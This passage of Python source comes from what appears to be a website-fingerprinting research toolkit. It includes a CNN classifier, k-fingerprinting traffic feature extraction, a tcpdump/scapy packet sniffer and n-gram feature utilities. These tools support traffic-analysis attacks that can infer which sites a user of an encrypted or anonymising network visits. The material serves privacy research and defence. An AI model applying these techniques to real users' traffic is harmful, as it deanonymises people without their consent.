name='fc1'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='fc1_act'))
model.add(layers.Dropout(0.7, name='fc1_dropout'))
model.add(layers.Dense(
512, kernel_initializer=initializers.glorot_uniform(seed=0),
name='fc2'))
model.add(layers.BatchNormalization())
model.add(layers.Activation('relu', name='fc2_act'))
model.add(layers.Dropout(0.5, name='fc2_dropout'))
model.add(layers.Dense(
n_classes, kernel_initializer=initializers.glorot_uniform(seed=0),
name='fc3'))
model.add(layers.Activation('softmax', name="softmax"))
model.compile(
loss="categorical_crossentropy",
optimizer=keras.optimizers.Adamax(
lr=0.002, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),
metrics=["accuracy"])
return model
class DeepFingerprintingClassifier(ModifiedKerasClassifier):
    """Website fingerprinting classifier using a CNN."""
def __init__(self, **kwargs):
super().__init__(build_fn=build_model, **kwargs)
def __repr__(self) -> str:
params = self.filter_sk_params(build_model)
return "DeepFingerprintingClassifier({})".format(
", ".join(f"{arg}={value!r}" for arg, value in params.items()))
```
#### File: classifiers/kfingerprinting/_features.py
```python
import math
import logging
import itertools
import functools
import tempfile
from typing import Tuple, Union, Sequence, Optional
import multiprocessing
import h5py
import numpy as np
from lab.trace import Direction, Trace
DEFAULT_NUM_FEATURES = 165
_LOGGER = logging.getLogger(__name__)
# --------------------
# Non-feeder functions
# --------------------
def split_in_out(list_data: Trace, check: bool = True) -> Tuple[Trace, Trace]:
"""Returns a tuple of the packets in the (incoming, outgoing) subtraces.
Raise AssertionError if check is true and the trace has no incoming or no
outgoing packets.
"""
# Use a fast-path for np record arrays
if isinstance(list_data, np.recarray):
incoming = list_data[list_data["direction"] < 0]
outgoing = list_data[list_data["direction"] > 0]
else:
incoming = [pkt for pkt in list_data if pkt.direction == Direction.IN]
outgoing = [pkt for pkt in list_data if pkt.direction == Direction.OUT]
if check:
assert len(incoming) > 0 and len(outgoing) > 0
return (incoming, outgoing)
def _get_timestamps(array_like) -> np.ndarray:
if isinstance(array_like, np.recarray):
return array_like["timestamp"]
return np.array([x[0] for x in array_like])
# -------------
# TIME FEATURES
# -------------
def _inter_pkt_time(list_data):
if len(list_data) == 1:
return [0.0, ]
times = _get_timestamps(list_data)
return (np.concatenate((times[1:], [times[0]])) - times)[:-1]
def interarrival_times(list_data):
"""Return the interarrival times of the incoming, outgoing, and overall
packet sequences.
"""
incoming, outgoing = split_in_out(list_data)
inter_in = _inter_pkt_time(incoming)
inter_out = _inter_pkt_time(outgoing)
inter_overall = _inter_pkt_time(list_data)
return inter_in, inter_out, inter_overall
def _prefix_keys(mapping: dict, prefix: Union[str, Sequence[str]]) -> dict:
if not isinstance(prefix, str):
prefix = '::'.join(prefix)
return {f'{prefix}::{key}': mapping[key] for key in mapping}
def _interarrival_stats(times: Sequence[float]) -> dict:
return {
'mean': np.mean(times) if len(times) > 0 else 0,
'max': max(times, default=0),
'std': np.std(times) if len(times) > 0 else 0,
'percentile-75': np.percentile(times, 75) if len(times) > 0 else 0
}
def interarrival_stats(list_data: Trace) -> dict:
"""Extract the mean, std, max, 75th-percentile for the incoming,
outgoing, and overall traces.
"""
incoming, outgoing, overall = interarrival_times(list_data)
return {
**_prefix_keys(_interarrival_stats(incoming), ['interarrival', 'in']),
**_prefix_keys(_interarrival_stats(outgoing), ['interarrival', 'out']),
**_prefix_keys(_interarrival_stats(overall),
['interarrival', 'overall']),
}
def time_percentiles(overall: Trace) -> dict:
"""Return the 25th, 50th, 75th and 100th percentiles of the timestamps."""
incoming, outgoing = split_in_out(overall)
def _percentiles(trace):
times = _get_timestamps(trace)
return {f'percentile-{p}': (np.percentile(times, p)
if len(times) > 0 else 0)
for p in [25, 50, 75, 100]}
return {
**_prefix_keys(_percentiles(incoming), ['time', 'in']),
**_prefix_keys(_percentiles(outgoing), ['time', 'out']),
**_prefix_keys(_percentiles(overall), ['time', 'overall']),
}
def packet_counts(overall: Trace) -> dict:
"""Return the number of incoming, outgoing and combined packets."""
incoming, outgoing = split_in_out(overall, check=False)
return {
'packet-counts::in': len(incoming),
'packet-counts::out': len(outgoing),
'packet-counts::overall': len(overall)
}
def head_and_tail_concentration(overall: Trace, count: int) -> dict:
"""Return the number of incoming and outgoing packets in the first and last
'count' packets of the trace.
"""
assert count > 0
head = packet_counts(overall[:count])
del head['packet-counts::overall']
tail = packet_counts(overall[-count:])
del tail['packet-counts::overall']
return {
**_prefix_keys(head, f'first-{count}'),
**_prefix_keys(tail, f'last-{count}')
}
def packet_concentration_stats(overall: Trace, chunk_size: int) \
-> Tuple[dict, Sequence[int]]:
"""Return the std, mean, min, max and median of the number of
outgoing packets in each chunk of the trace; as well as the
sequence of outgoing concentrations.
Each chunk is created with 'chunk_size' packets.
"""
concentrations = []
for index in range(0, len(overall), chunk_size):
chunk = overall[index:(index + chunk_size)]
concentrations.append(packet_counts(chunk)['packet-counts::out'])
return _prefix_keys({
'std::out': np.std(concentrations),
'mean::out': np.mean(concentrations),
'median::out': np.median(concentrations),
'min::out': min(concentrations),
'max::out': max(concentrations),
}, 'concentration-stats'), concentrations
def alternate_concentration(concentration: Sequence[int], length: int) \
-> Sequence[int]:
"""Return a fixed length sequence of the number of outgoing packets.
The sequence of concentrations, where each value is the number of
outgoing packets in a set of 20, is then partitioned into 20 sequences
    and each sequence is summed. This roughly equates to dividing the original
    sequence into 20 parts and counting the number of outgoing packets in each.
    The two differ in that the resulting groups may vary slightly in size
    depending on the length of the sequence. We therefore use the approach from
    the paper.
"""
# We use the array_split implementation as the chunkIt code was flawed and
# may return more chunks than requested.
result = [sum(group) for group in np.array_split(concentration, length)]
assert len(result) == length
return result
def alternate_packets_per_second(pps: Sequence[int], length: int) \
-> Tuple[dict, Sequence[int]]:
"""Return a fixed length sequence of the pps rate, as well as the sum of
    the rates.
"""
# We use the array_split implementation as the chunkIt code was flawed and
# may return more chunks than requested.
result = [sum(group) for group in np.array_split(pps, length)]
assert len(result) == length
return {'alt-pps::sum': sum(result)}, result
def packets_per_second_stats(overall: Trace) \
-> Tuple[dict, Sequence[int]]:
"""Return the mean, std, min, median and max number of packets per
second, as well as the number of packets each second.
"""
n_seconds = math.ceil(overall[-1].timestamp)
packets_per_sec, _ = np.histogram(
_get_timestamps(overall), bins=n_seconds, range=(0, n_seconds))
packets_per_sec = list(packets_per_sec)
return {
'pps::mean': np.mean(packets_per_sec),
'pps::std': np.std(packets_per_sec),
'pps::median': np.median(packets_per_sec),
'pps::min': min(packets_per_sec),
'pps::max': max(packets_per_sec)
}, packets_per_sec
def packet_ordering_stats(overall: Trace) -> dict:
"""Mean and std of a variant of the packet ordering features."""
# Note that the ordering here is different from the k-fingerprinting
# reference implementation. They have out and in swapped.
if isinstance(overall, np.recarray):
in_preceeding = np.nonzero(overall["direction"] < 0)[0]
out_preceeding = np.nonzero(overall["direction"] > 0)[0]
else:
in_preceeding = [i for i, pkt in enumerate(overall)
if pkt.direction == Direction.IN]
out_preceeding = [i for i, pkt in enumerate(overall)
if pkt.direction == Direction.OUT]
return {
'packet-order::out::mean': np.mean(out_preceeding),
'packet-order::in::mean': np.mean(in_preceeding),
'packet-order::out::std': np.std(out_preceeding),
'packet-order::in::std': np.std(in_preceeding),
}
def in_out_fraction(overall: Trace) -> dict:
"""Return the fraction of incoming and outgoing packets."""
counts = packet_counts(overall)
n_packets = counts['packet-counts::overall']
return {
'fraction-incoming': counts['packet-counts::in'] / n_packets,
'fraction-outgoing': counts['packet-counts::out'] / n_packets
}
# -------------
# SIZE FEATURES
# -------------
def _get_sizes(array_like):
if isinstance(array_like, np.recarray):
return array_like["size"]
return [x[2] for x in array_like]
def total_packet_sizes(overall: Trace) -> dict:
"""Return the total incoming, outgoing and overall packet sizes."""
incoming, outgoing = split_in_out(overall)
# Use absolute value in case the input sizes are signed
result = {
'total-size::in': np.sum(np.abs(_get_sizes(incoming))),
'total-size::out': np.sum(np.abs(_get_sizes(outgoing))),
}
result['total-size::overall'] = result['total-size::in'] \
+ result['total-size::out']
return result
def _packet_size_stats(trace: Trace) -> dict:
sizes = _get_sizes(trace)
return {
'mean': np.mean(sizes), 'var': np.var(sizes),
'std': np.std(sizes), 'max': np.max(sizes)
}
def packet_size_stats(overall: Trace) -> dict:
"""Return the mean, var, std, and max of the incoming, outgoing,
and overall packet traces.
"""
incoming, outgoing = split_in_out(overall)
return {
**_prefix_keys(_packet_size_stats(incoming), 'size-stats::in'),
**_prefix_keys(_packet_size_stats(outgoing), 'size-stats::out'),
**_prefix_keys(_packet_size_stats(overall), 'size-stats::overall'),
}
# ----------------
# FEATURE FUNCTION
# ----------------
def make_trace_array(
timestamps: Sequence[float], sizes: Sequence[float]
) -> np.ndarray:
"""Create a trace-like array from the sequence of timestamps and
signed sizes.
"""
assert len(timestamps) == len(sizes)
trace_array = np.recarray((len(timestamps), ), dtype=[
# Use i8 for sizes since we may be doing operations which overflow
("timestamp", "f8"), ("direction", "i1"), ("size", "i8")
])
trace_array["timestamp"] = timestamps
sizes = np.asarray(sizes, dtype=int)
np.sign(sizes, out=trace_array["direction"])
np.abs(sizes, out=trace_array["size"])
return trace_array
def _run_extraction(idx, directory: str, max_size: int):
# Use copies so that the original memory of the full file may be freed
with h5py.File(f"{directory}/data.hdf", mode="r") as h5file:
sizes = np.asarray(h5file["sizes"][idx], dtype=np.object)
times = np.asarray(h5file["timestamps"][idx], dtype=np.object)
return _extract_features_local(
timestamps=times, sizes=sizes, max_size=max_size)
def _extract_features_mp(
timestamps: Sequence[Sequence[float]], sizes: Sequence[Sequence[float]],
max_size: int = DEFAULT_NUM_FEATURES, n_jobs: Optional[int] = None
) -> np.ndarray:
features = np.zeros((len(sizes), max_size), float)
# Serialise the timestamps and sizes to file
with tempfile.TemporaryDirectory(prefix="kfp-extract-") as directory:
with h5py.File(f"{directory}/data.hdf", mode="w") as h5file:
dtype = h5py.vlen_dtype(np.dtype("float"))
h5file.create_dataset("sizes", data=sizes, dtype=dtype)
h5file.create_dataset("timestamps", data=timestamps, dtype=dtype)
offset = 0
# Use our own splits as imap chunking would yield them one at a time
chunksize = 5000
n_chunks = max(len(sizes) // chunksize, 1)
splits = np.array_split(np.arange(len(sizes)), n_chunks)
assert n_chunks == len(splits)
_LOGGER.info("Extracting features in %d batches...", n_chunks)
with multiprocessing.Pool(n_jobs) as pool:
# Pass the filenames and indices to the background process
for i, batch in enumerate(pool.imap(
functools.partial(
_run_extraction, directory=directory, max_size=max_size),
splits, chunksize=1
)):
                # Recombine the extracted feature batches in their original order
features[offset:offset+len(batch), :] = batch
offset += len(batch)
_LOGGER.info("Extraction is %.2f%% complete.",
((i+1) * 100 / n_chunks))
return features
def _extract_features_local(
timestamps: Sequence[Sequence[float]], sizes: Sequence[Sequence[float]],
max_size: int = DEFAULT_NUM_FEATURES
) -> np.ndarray:
features = np.ndarray((len(sizes), max_size), dtype=float)
for i, (size_row, times_row) in enumerate(zip(sizes, timestamps)):
features[i] = extract_features(
timestamps=times_row, sizes=size_row, max_size=max_size)
return features
def extract_features_sequence(
trace: Optional[Sequence[Trace]] = None,
max_size: int = DEFAULT_NUM_FEATURES,
timestamps: Optional[Sequence[Sequence[float]]] = None,
sizes: Optional[Sequence[Sequence[float]]] = None,
n_jobs: Optional[int] = 1
) -> np.ndarray:
"""Convenience method around extract_features that accepts a
sequence of timestamps and sizes for multiple samples.
If n_jobs is provided, use multiple processes to extract the
features. An n_jobs of None will use all available processes
"""
if trace is not None:
raise NotImplementedError("Trace input not currently supported.")
assert timestamps is not None
assert sizes is not None
if n_jobs != 1:
_LOGGER.info("Extracting features using %r processes", n_jobs)
return _extract_features_mp(
timestamps=timestamps, sizes=sizes, max_size=max_size,
n_jobs=n_jobs)
_LOGGER.info("Extracting features locally.")
return _extract_features_local(
timestamps=timestamps, sizes=sizes, max_size=max_size)
def extract_features(
trace: Trace = None, max_size: int = DEFAULT_NUM_FEATURES,
timestamps: Optional[Sequence[float]] = None,
sizes: Optional[Sequence[float]] = None
) -> np.ndarray:
"""Return a tuple of features of the specified size, according to the paper
Hayes, Jamie, and <NAME>. "k-fingerprinting: A robust
scalable website fingerprinting technique." 25th {USENIX} Security
Symposium ({USENIX} Security 16). 2016.
Either trace or both sizes and timestamps must be specified.
"""
if trace is None and (timestamps is None or sizes is None):
raise ValueError("timestamps and sizes must be specified when trace is "
"None.")
if trace is not None and (timestamps is not None or sizes is not None):
raise ValueError("Either trace or both sizes and timestamps should be "
"specified.")
if trace is None:
assert timestamps is not None and sizes is not None
trace = make_trace_array(timestamps=timestamps, sizes=sizes)
assert trace[0].timestamp == 0
all_features = {}
all_features.update(interarrival_stats(trace))
all_features.update(time_percentiles(trace))
all_features.update(packet_counts(trace))
all_features.update(head_and_tail_concentration(trace, 30))
stats, concentrations = packet_concentration_stats(trace, 20)
all_features.update(stats)
stats, pps = packets_per_second_stats(trace)
all_features.update(stats)
all_features.update(packet_ordering_stats(trace))
all_features.update(in_out_fraction(trace))
all_features.update(total_packet_sizes(trace))
all_features.update(packet_size_stats(trace))
result = [all_features[feat] for feat in DEFAULT_TIMING_FEATURES]
# Alternate concentration feature
result.extend(alternate_concentration(concentrations, 20))
# Alternate packets per second features
stats, alt_pps = alternate_packets_per_second(pps, 20)
result.extend(alt_pps)
result.append(stats['alt-pps::sum'])
# Assert on the length of the core features from the paper
assert len(result) == 87
result.extend(all_features[feat] for feat in DEFAULT_SIZE_FEATURES)
# Assert on the overall length of the sizes and timing features
assert len(result) == 102
remaining_space = max_size - len(result)
    # Align the concentrations and pps features by allocating each roughly
    # half of the remaining space, padding with zeros otherwise
if remaining_space > 0:
_extend_exactly(result, concentrations, (remaining_space + 1) // 2)
_extend_exactly(result, pps, remaining_space // 2)
assert len(result) == max_size
return np.asarray(result[:max_size])
def _extend_exactly(lhs, rhs, amount: int, padding: int = 0):
"""Extend lhs, with exactly amount elements from rhs. If there are
not enough elements, lhs is padded to the correct amount with padding.
"""
padding_len = amount - len(rhs) # May be negative
lhs.extend(rhs[:amount])
lhs.extend([padding] * padding_len) # NO-OP if padding_len is negative
DEFAULT_TIMING_FEATURES = [
# Interarrival stats
'interarrival::in::max', 'interarrival::out::max',
'interarrival::overall::max', 'interarrival::in::mean',
'interarrival::out::mean', 'interarrival::overall::mean',
'interarrival::in::std', 'interarrival::out::std',
'interarrival::overall::std', 'interarrival::in::percentile-75',
'interarrival::out::percentile-75', 'interarrival::overall::percentile-75',
# Timestamp percentiles
'time::in::percentile-25', 'time::in::percentile-50',
'time::in::percentile-75', 'time::in::percentile-100',
'time::out::percentile-25', 'time::out::percentile-50',
'time::out::percentile-75', 'time::out::percentile-100',
'time::overall::percentile-25', 'time::overall::percentile-50',
'time::overall::percentile-75', 'time::overall::percentile-100',
# Packet counts
'packet-counts::in', 'packet-counts::out', 'packet-counts::overall',
# First and last 30 packet concentrations
'first-30::packet-counts::in', 'first-30::packet-counts::out',
'last-30::packet-counts::in', 'last-30::packet-counts::out',
# Some concentration stats
'concentration-stats::std::out', 'concentration-stats::mean::out',
# Some packets per-second stats
'pps::mean', 'pps::std',
# Packet ordering statistics
'packet-order::out::mean', 'packet-order::in::mean',
'packet-order::out::std', 'packet-order::in::std',
# Concentration stats ctd.
'concentration-stats::median::out',
# Remaining packet per second stats
'pps::median', 'pps::min', 'pps::max',
# Concentration stats ctd.
'concentration-stats::max::out',
# Fraction of packets in each direction
'fraction-incoming', 'fraction-outgoing',
]
DEFAULT_SIZE_FEATURES = [
# Total sizes
'total-size::in', 'total-size::out', 'total-size::overall',
# Size statistics
'size-stats::in::mean', 'size-stats::in::max', 'size-stats::in::var',
'size-stats::in::std',
'size-stats::out::mean', 'size-stats::out::max', 'size-stats::out::var',
'size-stats::out::std',
'size-stats::overall::mean', 'size-stats::overall::max',
'size-stats::overall::var', 'size-stats::overall::std',
]
ALL_DEFAULT_FEATURES = list(itertools.chain(
DEFAULT_TIMING_FEATURES,
[f'alt-conc::{i}' for i in range(20)],
[f'alt-pps::{i}' for i in range(20)],
['alt-pps::sum'],
DEFAULT_SIZE_FEATURES,
[f'conc::{i}' for i in range((DEFAULT_NUM_FEATURES - 102 + 1) // 2)],
[f'pps::{i}' for i in range((DEFAULT_NUM_FEATURES - 102) // 2)]
))
```
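For orientation, here is a minimal usage sketch of the feature extraction above. The import path (`lab.classifiers.kfingerprinting._features`) and the toy trace values are assumptions; the code itself only requires that timestamps start at zero and that both directions are present.
```python
# Minimal sketch, assuming the module above is importable as
# lab.classifiers.kfingerprinting._features (import path is an assumption).
from lab.classifiers.kfingerprinting._features import (
    extract_features, extract_features_sequence)

# Toy trace: timestamps must start at 0; signed sizes encode direction
# (positive = outgoing, negative = incoming).
timestamps = [0.0, 0.01, 0.03, 0.05, 0.20]
sizes = [1500, -1400, 600, -1200, 700]

features = extract_features(timestamps=timestamps, sizes=sizes)
print(features.shape)  # (165,) -- DEFAULT_NUM_FEATURES

# Batch extraction over several samples; n_jobs != 1 switches to the
# multiprocessing path that serialises the inputs to a temporary HDF5 file.
batch = extract_features_sequence(
    timestamps=[timestamps, timestamps], sizes=[sizes, sizes], n_jobs=1)
print(batch.shape)  # (2, 165)
```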
#### File: wf-tools/lab/sniffer.py
```python
import io
import abc
from abc import abstractmethod
import time
import logging
import threading
from typing import Optional, IO, List
import signal
import tempfile
import subprocess
from subprocess import CompletedProcess, CalledProcessError
try:
import scapy
import scapy.compat
import scapy.plist
import scapy.sendrecv
import scapy.utils
from scapy.layers import inet, l2
# Enable parsing only to the level of UDP and TCP packets
l2.Ether.payload_guess = [({"type": 0x800}, inet.IP)]
inet.IP.payload_guess = [
({"frag": 0, "proto": 0x11}, inet.UDP), ({"proto": 0x06}, inet.TCP)
]
inet.UDP.payload_guess = []
inet.TCP.payload_guess = []
except ImportError:
USE_SCAPY = False
else:
USE_SCAPY = True
class SnifferStartTimeout(Exception):
"""Raised when the sniffer fails to start due to a timeout."""
class PacketSniffer(abc.ABC):
"""Base class for packet sniffers."""
@property
def results(self) -> bytes:
"""Alias for pcap"""
return self.pcap()
@abstractmethod
def pcap(self) -> bytes:
"""Return the pcap as bytes."""
@abstractmethod
def start(self) -> None:
"""Begin capturing packets."""
@abstractmethod
def stop(self) -> None:
"""Stop capturing packets."""
if USE_SCAPY:
class ScapyPacketSniffer(PacketSniffer):
"""Class for capturing network traffic."""
stop_delay = 1
def __init__(self, capture_filter: str = 'tcp or udp',
snaplen: Optional[int] = None, **kwargs):
def _started_callback():
with self._start_condition:
self._started = True
self._start_condition.notify_all()
self._logger = logging.getLogger(__name__)
self._filter = capture_filter
self._start_condition = threading.Condition()
self._started = False
self._sniffer = scapy.sendrecv.AsyncSniffer(
filter=capture_filter,
started_callback=_started_callback,
promisc=False,
**kwargs,
)
self.snaplen = snaplen
def _truncate_pcap(self, pcap: bytes) -> bytes:
assert self.snaplen is not None and self.snaplen > 0
command = ['editcap', '-F', 'pcap',
'-s', str(self.snaplen), '-', '-']
process = subprocess.Popen(
command, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate(pcap)
if process.returncode != 0:
raise subprocess.CalledProcessError(
process.returncode, ' '.join(command), stdout, stderr)
return stdout
def pcap(self) -> bytes:
"""Returns the results in pcap format serialised to bytes."""
pcap = ScapyPacketSniffer.to_pcap(self._sniffer.results)
if self.snaplen:
self._logger.info("Truncating packets to %d bytes",
self.snaplen)
pcap = self._truncate_pcap(pcap)
return pcap
@staticmethod
def to_pcap(packet_list: scapy.plist.PacketList) -> bytes:
"""Encodes the provided packet list in PCAP format."""
byte_buffer = io.BytesIO()
with scapy.utils.PcapWriter(byte_buffer) as writer:
writer.write(packet_list)
writer.flush()
# PcapWriter will close the bytebuffer so must return in 'with'
return byte_buffer.getvalue()
def start(self) -> None:
"""Start capturing packets."""
with self._start_condition:
self._sniffer.start()
notified = self._start_condition.wait_for(lambda: self._started,
timeout=5)
if not notified:
raise SnifferStartTimeout()
self._logger.info('Began sniffing for traffic with filter "%s"',
self._filter)
def stop(self) -> None:
"""Stop capturing packets."""
self._logger.info('Waiting %.2fs for sniffer to flush',
self.stop_delay)
time.sleep(self.stop_delay)
try:
self._sniffer.stop()
except OSError as err:
if err.errno != 9:
raise
if self._sniffer.running:
self._logger.fatal('%s has been raised by the sniffer but '
'the sniffer is still running.', err)
raise
self._logger.info('%s has been suppressed as the sniffer is not'
' running.', err)
if not self._sniffer.results:
self._logger.warning('Sniffing complete but failed to capture '
'packets [result: %s]', self.results)
return
self._sniffer.results = scapy.plist.PacketList(
name='Sniffed',
res=self._sniffer.results,
stats=[inet.TCP, inet.UDP])
self._logger.info('Sniffing complete. %r', self._sniffer.results)
class TCPDumpPacketSniffer(PacketSniffer):
"""A wrapper around TCPDump to perform traffic sniffing."""
start_delay = 2
# How long to wait before terminating the sniffer
stop_delay = 2
buffer_size = 4096
def __init__(
self, capture_filter: str = 'udp or tcp', iface: Optional[str] = None,
snaplen: Optional[int] = None
):
self._log = logging.getLogger(__name__)
self._subprocess: Optional[subprocess.Popen] = None
self._pcap: Optional[IO[bytes]] = None
self.interface = iface or 'any'
self.snaplen = snaplen or 0
self.capture_filter = capture_filter
self._args: List[str] = []
def pcap(self) -> bytes:
assert self._pcap is not None
pcap_bytes = self._pcap.read()
self._pcap.seek(0)
return pcap_bytes
def is_running(self) -> bool:
"""Returns true if the sniffer is running."""
return self._subprocess is not None
def start(self) -> None:
assert not self.is_running()
self._pcap = tempfile.NamedTemporaryFile(mode='rb', suffix='.pcap')
self._args = [
'tcpdump', '-n', '--buffer-size', str(self.buffer_size),
'--interface', self.interface, '--dont-verify-checksums',
'--no-promiscuous-mode', '--snapshot-length', str(self.snaplen),
'-w', self._pcap.name, self.capture_filter]
self._subprocess = subprocess.Popen(
self._args, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE)
time.sleep(self.start_delay)
self._log.info("Started tcpdump: '%s'", ' '.join(self._args))
def _terminate(self) -> CompletedProcess:
assert self.is_running()
assert self._subprocess is not None
if self._subprocess.poll() is None:
# Wait for tcpdump to flush, this may only work because it's in
# packet-buffered & immediate modes
self._log.info('Waiting %.2fs for tcpdump to flush',
self.stop_delay)
time.sleep(self.stop_delay)
stdout, stderr = stop_process(
self._subprocess, timeout=3, name="tcpdump")
return_code = 0
else:
self._log.debug("tcpdump already terminated")
stdout, stderr = self._subprocess.communicate()
return_code = self._subprocess.poll()
return CompletedProcess(self._args, return_code, stdout, stderr)
def stop(self) -> None:
"""Stops sniffing."""
assert self.is_running()
result = self._terminate()
try:
result.check_returncode()
except CalledProcessError as err:
self._log.fatal(
"TCPDump failed with error:\n%s", err.stderr.decode('utf-8'))
raise
else:
n_collected = ', '.join(result.stderr.decode('utf-8').strip()
.split('\n')[-3:])
self._log.info("tcpdump complete: %s", n_collected)
finally:
self._subprocess = None
def stop_process(
process: subprocess.Popen, timeout: int = 5, name: str = ''
) -> tuple:
"""Stop the process by sending SIGINT -> SIGTERM -> SIGKILL, waiting 5
seconds between each pair of signals.
"""
log = logging.getLogger(__name__)
name = name or 'process'
for sig in (signal.SIGINT, signal.SIGTERM, signal.SIGKILL):
log.info("Stopping %s with %s.", name, sig)
next_timeout = None if sig == signal.SIGKILL else timeout
try:
process.send_signal(sig)
return process.communicate(timeout=next_timeout)
except subprocess.TimeoutExpired:
log.info("%s did not stop after %.2fs. Trying next signal",
name, next_timeout)
except subprocess.CalledProcessError as err:
if err.returncode in (signal.SIGTERM, signal.SIGKILL):
return err.stdout, err.stderr
raise
assert False
return None, None
```
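A hedged usage sketch for the tcpdump-based sniffer above; it assumes `tcpdump` is on the PATH, sufficient capture privileges, and an interface name (`eth0` here is an assumption).
```python
# Sketch only: requires tcpdump and capture privileges; "eth0" is an assumption.
from lab.sniffer import TCPDumpPacketSniffer

sniffer = TCPDumpPacketSniffer(capture_filter="udp or tcp", iface="eth0", snaplen=96)
sniffer.start()
# ... perform the page fetch or other traffic-generating work here ...
sniffer.stop()

# The capture is buffered in a temporary file and returned as raw pcap bytes.
with open("capture.pcap", "wb") as pcap_file:
    pcap_file.write(sniffer.pcap())
```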
#### File: li2018measuring/FeatureUtil/Ngram.py
```python
def NgramLocator(sample, Ng):
    # locate which bucket this n-gram maps to in NgramExtract
index = 0
for i in range(0, Ng):
if sample[i] == 1:
bit = 1
else:
bit = 0
index = index + bit * (2**(Ng-i-1))
return index
def NgramExtract(sizes, NGRAM):
# n-gram feature for ordering
counter = 0
buckets = [0]*(2**NGRAM)
for i in range(0, len(sizes)-NGRAM+1):
index = NgramLocator(sizes[i:i+NGRAM], NGRAM)
buckets[index] = buckets[index] + 1
counter = counter + 1
return buckets
```
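A small worked example of the n-gram bucketing above, assuming the two functions are in scope (e.g. imported from this module). Directions are encoded as +1 (outgoing) and -1 (incoming), and each n-gram is mapped to one of 2**n buckets.
```python
# Worked example (assumes NgramExtract/NgramLocator from the module above).
directions = [1, -1, 1, 1, -1]
print(NgramExtract(directions, 2))
# -> [0, 1, 2, 1]: counts for the 2-grams (-,-), (-,+), (+,-), (+,+)
```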
#### File: li2018measuring/FeatureUtil/PktNum.py
```python
def roundArbitrary(x, base):
return int(base * round(float(x)/base))
# packet number features
def PacketNumFeature(times, sizes, features):
total = len(times)
features.append(total)
# count is outgoing pkt. number
count = 0
for x in sizes:
if x > 0:
count += 1
features.append(count)
features.append(total - count)
    # k-anonymity features also include incoming/total and outgoing/total ratios
out_total = float(count)/total
in_total = float(total - count)/total
features.append( out_total*100 )
features.append( in_total*100 )
# rounded version, from WPES 2011
features.append( roundArbitrary(total, 15) )
features.append( roundArbitrary(count, 15) )
features.append( roundArbitrary(total - count, 15) )
features.append( roundArbitrary(out_total*100, 5) )
features.append( roundArbitrary(in_total*100, 5) )
    # total packet size (also called bandwidth);
    # effectively proportional to the packet counts, but include them anyway
features.append(total*512)
features.append(count*512)
features.append( (total-count)*512 )
```
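A quick check of the packet-count features, assuming `PacketNumFeature` is in scope (e.g. imported from this module); the function appends its 13 values to the caller-supplied list.
```python
# Toy trace: 3 outgoing (+1) and 2 incoming (-1) packets.
features = []
PacketNumFeature([0.0, 0.1, 0.2, 0.3, 0.4], [1, -1, 1, 1, -1], features)
print(features[:3])   # [5, 3, 2] -> total, outgoing, incoming counts
print(len(features))  # 13 features in total
```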
#### File: li2018measuring/FeatureUtil/TransPosition.py
```python
import numpy
# Transpositions (similar to the good distance scheme)
# how many packets are in front of the outgoing/incoming packet?
def TransPosFeature(times, sizes, features):
# for outgoing packets
count = 0
temp = []
for i in range(0, len(sizes)):
if sizes[i] > 0:
count += 1
features.append(i)
temp.append(i)
if count == 300:
break
for i in range(count, 300):
features.append("X")
# std
features.append(numpy.std(temp))
# ave
features.append(numpy.mean(temp))
# for incoming packets
count = 0
temp = []
for i in range(0, len(sizes)):
if sizes[i] < 0:
count += 1
features.append(i)
temp.append(i)
if count == 300:
break
for i in range(count, 300):
features.append("X")
# std
features.append(numpy.std(temp))
# ave
features.append(numpy.mean(temp))
```
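A small example of the transposition features above, assuming `TransPosFeature` is in scope; each direction contributes up to 300 positions (padded with the string "X") plus a standard deviation and a mean.
```python
# Toy trace: outgoing packets at positions 0 and 2, one incoming at position 1.
features = []
TransPosFeature([0.0, 0.1, 0.2], [1, -1, 1], features)
print(features[:2], len(features))  # [0, 2] 604  (2 * (300 + 2) entries)
```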
#### File: third_party/li2018measuring/util.py
```python
from .Param import *
import os
def PathReader(keyword):
    # ID_PATH is where crawl ids are recorded
global DATASET_PATH, ID_PATH
f = open(ID_PATH + keyword, 'r')
crawl = list()
for each_line in f.readlines():
path_temp = each_line.strip('\n')[0:-1]
name = os.path.basename(path_temp)
crawl.append(DATASET_PATH + keyword + '/' + name + '/')
return crawl
# normalize traffic
def NormalizeTraffic(times, sizes):
# sort
tmp = sorted(zip(times, sizes))
times = [x for x, _ in tmp]
sizes = [x for _, x in tmp]
TimeStart = times[0]
PktSize = 500
# normalize time
for i in range(len(times)):
times[i] = times[i] - TimeStart
# normalize size
for i in range(len(sizes)):
sizes[i] = ( abs(sizes[i])/PktSize )*cmp(sizes[i], 0)
    # flatten the trace into one cell per packet
newtimes = list()
newsizes = list()
for t, s in zip(times, sizes):
numCell = abs(s)
oneCell = cmp(s, 0)
for r in range(numCell):
newtimes.append(t)
newsizes.append(oneCell)
times = newtimes
sizes = newsizes
# TrafficReformat
def TrafficReformat(line):
comp = line.split(',')
time = comp[0]
pkt = comp[7]
return [time, pkt]
```
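`NormalizeTraffic` relies on the Python 2 built-in `cmp`, which no longer exists in Python 3. A small shim (an assumption, not part of the original code) restores the behaviour if this module is run under Python 3:
```python
# Python 3 compatibility shim for the `cmp` calls above (assumption: the
# original code targeted Python 2, where cmp() was a built-in).
def cmp(a, b):
    """Return -1, 0 or 1 depending on the sign of a - b."""
    return (a > b) - (a < b)
```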
#### File: wf-tools/lab/trace.py
```python
import io
import json
import logging
import itertools
import subprocess
from enum import IntEnum
from ipaddress import IPv4Network, IPv6Network, ip_address
from typing import List, NamedTuple, Tuple, Union, Optional
import dataclasses
from dataclasses import dataclass
from mypy_extensions import TypedDict
import pandas as pd
Trace = List["Packet"]
IPNetworkType = Union[IPv4Network, IPv6Network]
_LOGGER = logging.getLogger(__name__)
class Direction(IntEnum):
"""The direction of a packet, incoming or outgoing."""
IN = -1 # pylint: disable=invalid-name
OUT = 1
class Packet(NamedTuple):
"""A packet in a trace.
An outgoing packet has a direction of 1 and an incoming packet has a
direction of -1. The size of the packet is in bytes.
"""
timestamp: float
direction: Direction
size: int
class ClientIndeterminable(Exception):
"""Raised if it is not possible to determine the client from the sequence of
packets.
"""
class PcapParsingError(Exception):
"""Raised when we fail to parse the pcap."""
def _determine_client_ip(packets: pd.DataFrame, client_subnet) -> str:
